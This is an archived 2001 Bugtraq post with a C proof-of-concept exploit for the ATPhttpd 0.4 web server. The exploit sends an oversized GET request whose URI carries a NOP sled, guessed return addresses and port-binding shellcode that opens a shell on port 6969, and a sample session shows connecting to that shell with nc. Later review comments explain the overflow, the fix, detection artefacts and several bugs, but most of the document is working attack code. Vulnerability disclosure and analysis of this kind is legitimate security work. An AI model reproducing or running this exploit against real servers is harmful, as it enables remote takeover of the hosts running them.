ATPhttpd 0.4 DoS Vulnerability (POC exploit)


Date: Sat, 15 Dec 2001 21:50:28 -0800
From: methodic <methodic@slartibartfast.angrypacket.com>
To: bugtraq@securityfocus.com
Subject: ATPhttpd 0.4 DoS Vulnerability (POC exploit)

--XsQoSWH+UP9D9v3l
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Proof of concept exploit for ATPhttpd 0.4

-- 
+ methodic >> [http://methodic.angrypacket.com] -- -
+ Cannot find nsabackdoor.dll. Please reinstall Windows.

--XsQoSWH+UP9D9v3l
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="atphttpd-smack.c"

/* remote exploit for ATPhttpd 0.4 */
/* $Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */

/* Another 31336++ codez from AngryPacket */

/*
 * "Tamer Sahin" <ts@securityoffice.net> posted to BUGTRAQ that there
 * was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the 
 * source for the hell of it. Ran ye old perl Ax4000|nc and did some 
 * gdb'n and noticed that it said the return address was 0x41414141. 
 * Well that speaks for itself...
 *
 * - dmuz@angrypacket.com
 */

/*
 * developed and tested against OpenBSD. exploit creates a port-binding
 * shell on the remote machine on port 6969 with the uid of the server.
 * try offsets between 5000 and -5000 with increments of 100. -200 worked
 * like a charm for me.
 *
 * ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
 * [methodic@vulnhost] [~]$ nc localhost 6969
 * whoami
 * methodic
 * id
 * uid=1009(methodic) gid=1009(methodic)
 * ^C punt!
 *
 * mad thankz to vegac who helped me with a lame bug i was overlooking
 */

/* this exploit code by methodic with a little from dmuz */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

/* 701 A's to own the EIP */
#define LEN		900
#define NOP		0x90

/* port binding shellcode (6969/tcp) by noir */
/* 37 words, read back byte-wise in main() through ptr = (char *)&shellcode,
 * so the byte sequence the exploit actually sends depends on the build
 * host's sizeof(long) and byte order.  No word's value contains a 0x00 byte
 * and there is no terminating entry: the strlen(ptr) in main() has no
 * in-bounds NUL to stop at (see the note there). */
long shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};

/* Returns this process's stack pointer; main() uses it as the base for the
 * guessed return address.  The inline asm copies %esp into %eax and the
 * function then falls off the end with no return statement, relying on %eax
 * being the i386 return register.  That makes it x86-32/GCC specific and,
 * strictly, undefined behaviour in C (missing return in a non-void function
 * whose value is used). */
unsigned long get_sp(void) {
	__asm__("movl %esp,%eax");
}

/*
 * Entry point.  Parses -h <ip> / -p <port> / -o <offset>, connects to the
 * target, builds a single HTTP GET whose request-URI is a LEN-byte (900)
 * stack-smash payload -- return-address words over the whole buffer, a NOP
 * run over the first (LEN/2)-100 bytes, then the shellcode -- and sends it.
 * The header comments report that a long run of A's overwrote the saved
 * return address (0x41414141, ~701 bytes), i.e. presumably an unbounded copy
 * of the request line into a stack buffer; the server-side fix is bounding
 * that copy.  Defender-observable artefacts: an oversized GET request line
 * containing a long 0x90 run and, on success, a new listener on 6969/tcp
 * running as the server's uid (see the shellcode comment above).
 *
 * Review notes (left as-is, not fixed here):
 *  - usage() is called before any declaration of it (implicit function
 *    declaration, invalid since C99).
 *  - offset is an int but is assigned from atol() and printed with %ld
 *    (format/argument mismatch).
 *  - inet_addr(), malloc() and send() return values are never checked.
 *  - strlen(ptr) is taken on the shellcode array, which contains no NUL
 *    byte, so the copy length depends on whatever memory follows it.
 *  - the payload stores are done as *(long *), so the layout assumes
 *    sizeof(long) == 4; with a wider long the last store (i == 896) runs
 *    past the 900-byte buffer.
 */
int main(int argc, char *argv[]) {

	int sockfd=0, port=0, offset=0;
	int ch, i;
	long retaddr;
	char *host=NULL, http_request[LEN+20];	/* "GET " + payload + " HTTP/1.0\r\n\r\n" */
	char *payload, *ptr=(char *)&shellcode;	/* byte view of the shellcode words */
	struct sockaddr_in s;

	/* -h target, -p port (defaults to 80 below), -o offset subtracted from get_sp() */
	while ((ch = getopt(argc, argv, "h:p:o:")) != -1) {
		switch (ch) {
			case 'h':
				host = optarg;
				break;
			case 'p':
				port = atoi(optarg);
				break;
			case 'o':
				offset = atol(optarg);	/* long -> int narrowing */
				break;
		}
	}

	printf(">> atphttpd 0.4b exploit, written by angrypacket security crew\n");
	/* usage() calls exit(), so host is non-NULL from here on */
	if(!host) {
		usage(argv[0]);
	}
	if(!port) {
		port = 80;
	}

	/* setup socket structure */
	bzero(&s, sizeof(s));
	s.sin_family = AF_INET;
	s.sin_port = htons(port);
	/* inet_addr() yields INADDR_NONE for an unparsable -h value; not checked */
	s.sin_addr.s_addr = inet_addr(host);

	if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror(" + socket");
		exit(1);
	}

	if(connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
		perror(" + connect");
		exit(1);
	}

	/* build c0dez.. */
	payload = (char *)malloc(LEN);	/* result not checked for NULL */

	/* guessed return address: this process's own stack pointer minus the
	 * user-supplied offset (hence the trial-and-error offsets described in
	 * the header comment) */
	retaddr = get_sp() - offset;
	printf(" + building payload [retaddr: 0x%lx] [offset: %ld]\n", retaddr, offset);

	/* fill the buffer with return addr's */
	/* one long every 4 bytes; stays in bounds only while sizeof(long) == 4 */
	for(i = 0; i < LEN; i += 4)
		*(long *)&payload[i] = retaddr;

	/* fill in some NOPs */
	/* overwrites the first (LEN/2)-100 = 350 bytes; i == 350 afterwards */
	for(i = 0; i < ((LEN/2) - 100); i++)
		*(payload + i) = NOP;

	/* copy the shellcode and terminate the payload string */
	/* strlen() on the non-terminated shellcode array: the scan reads past
	 * the array (out-of-bounds read), and a result above LEN-350 would make
	 * this memcpy overrun payload as well */
	memcpy(payload + i, ptr, strlen(ptr));
	payload[LEN-1] = '\0';	/* caps the strcat() below at LEN-1 bytes (an earlier NUL byte in retaddr would cut it shorter) */

	/* 4 + (LEN-1) + 13 + NUL = LEN+17 <= LEN+20, so http_request is large enough */
	bzero(&http_request, LEN+20);
	strcpy(http_request, "GET ");
	strcat(http_request, payload);
	strcat(http_request, " HTTP/1.0\r\n\r\n");
	free(payload);

	printf(" + sending payload to <%s> on port [%d].. ", host, port);
	send(sockfd, http_request, strlen(http_request), 0);	/* return value ignored */
	printf("done\n");
	close(sockfd);

	printf(" + now connect to port 6969 on <%s> (be good!)\n", host);
	printf(">> visit http://sec.angrypacket.com for more security tools\n");

	return(0);

}

/* Print the command-line synopsis to stderr and terminate the process.
 * Never returns; the int return type is nominal.  Note that the exit
 * status is 0 even though this is reached on a missing -h argument.
 * main() calls this before any prototype of it is visible. */
int usage(char *progname) {
	/* single write: prefix, program name, option synopsis */
	fprintf(stderr, "%s%s%s",
		"usage: ", progname,
		" -h <target ip> -p <target port> -o <offset>\n");
	exit(0);
}

--XsQoSWH+UP9D9v3l--
